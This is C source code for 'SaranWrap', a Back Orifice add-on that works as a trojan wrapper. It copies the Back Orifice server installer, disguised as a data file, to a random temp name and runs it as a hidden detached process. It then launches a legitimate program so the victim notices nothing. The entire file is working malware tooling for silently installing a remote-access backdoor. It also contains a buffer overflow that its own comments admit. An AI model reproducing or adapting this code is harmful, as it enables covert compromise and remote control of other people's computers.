/////////////////////////////////////////////////////////////////
// SaranWrap.c
//  A Back Orifice goodie -- used to launch a copy of the Back
//  Orifice installer before running a "real" program.  A copy
//  of the installer is used so that the packaged installer
//  is not deleted upon execution.
/////////////////////////////////////////////////////////////////
// Future modification:
//  Encapsulate Saran Wrap, the real EXE, and the BO Installer into
//  a single executable.

#include <windows.h>
#include <stdio.h>
#include <time.h>

/////////////////////////////////////////////////////////////////
// Configuration Information
//
#define INSTALLER_NAME		"DATA1.Z"
	//INSTALLER_NAME is the name of "BOSERVER.EXE"
#define REAL_PROGRAM_NAME	"DATA2.Z"
	//REAL_PROGRAM_NAME is the name of the "real" program that needs to be run after
	//installing BO


/////////////////////////////////////////////////////////////////
// fillStartupInfo -- Fill the STARTUPINFO structure with some
// generic, default information
void fillStartupInfo(STARTUPINFO *si, WORD state)
{
	//The hidden process' startup information (make sure it is hidden)
	si->cb = sizeof(si);
	si->lpReserved = NULL;
	si->lpDesktop = NULL;
	si->lpTitle = NULL;
	si->dwFlags = STARTF_USESHOWWINDOW;
	si->wShowWindow = state;
	si->cbReserved2 = 0;
	si->lpReserved2 = NULL;
}

/////////////////////////////////////////////////////////////////
// quickly build a temporary name...
void buildTempFileName(char *name, int len)
{
	char fallbackEnv[] = "C:\\";
	char *env;
	char *p;
	
	// If "TEMP" is defined use it.  Else if "TMP" is defined, use
	// that instead.  If neither is defined, we'll go out on a limb
	// and assume that C:\ is a good temp folder.
	if ((env = getenv("TEMP")) == NULL)
		if ((env = getenv("TMP")) == NULL)
			env = &fallbackEnv[0];
	//same as...strcpy(name, env);
	p = name;
	while (*env)
		*p++ = *env++;
	// ^^ Buffer overflow, waiting to happen.
	// Add a trailing backslash, if necessary
	if (*(p-1) != '\\')
		*p++ = '\\';
	*p++ = '~';
	srand( (unsigned)time( NULL ) );
	for (int i=0; i<7; i++)
		*p++ = (char)(rand() % 26)+'A';
	*p++ = '.';
	*p++ = 't';
	*p++ = 'm';
	*p++ = 'p';
	*p = 0;
}

/////////////////////////////////////////////////////////////////
// WinMain
int WINAPI WinMain( HINSTANCE hInstance, // handle to current instance 
					HINSTANCE hPrevInstance, // handle to previous instance 
					LPSTR lpCmdLine, // pointer to command line 
					int nCmdShow // show state of window 
)
{
	char tempFile[128] = "";
	STARTUPINFO si;
	PROCESS_INFORMATION pi;

	fillStartupInfo(&si, SW_HIDE);
	//Attempt to secure a temporary file name (if we cannot, we have to skip all the
	// rest except for execution of the "real" program).
	//  (supposedly tempFile gets allocated by the system and deleted "later" (program
	//   termination?) automatically)
	//if ((tempFile = tmpnam(NULL)) != NULL)
	//{
	buildTempFileName(tempFile, 128);
		//Copy installer to the temporary file name
		CopyFile(INSTALLER_NAME, tempFile, FALSE);
		//Execute installer (which will delete itself when finished)
		CreateProcess(tempFile, tempFile, NULL, NULL, TRUE, 
			DETACHED_PROCESS, NULL, NULL, &si, &pi);
		//spawnlp(_P_DETACH, tempFile, tempFile, NULL);
	//}
	fillStartupInfo(&si, SW_SHOWDEFAULT);
	//Execute real program
	CreateProcess(REAL_PROGRAM_NAME, REAL_PROGRAM_NAME, NULL, NULL, TRUE, 
		DETACHED_PROCESS, NULL, NULL, &si, &pi);
	//spawnlp(_P_DETACH, REAL_PROGRAM_NAME, REAL_PROGRAM_NAME, NULL);
	return 0;
}
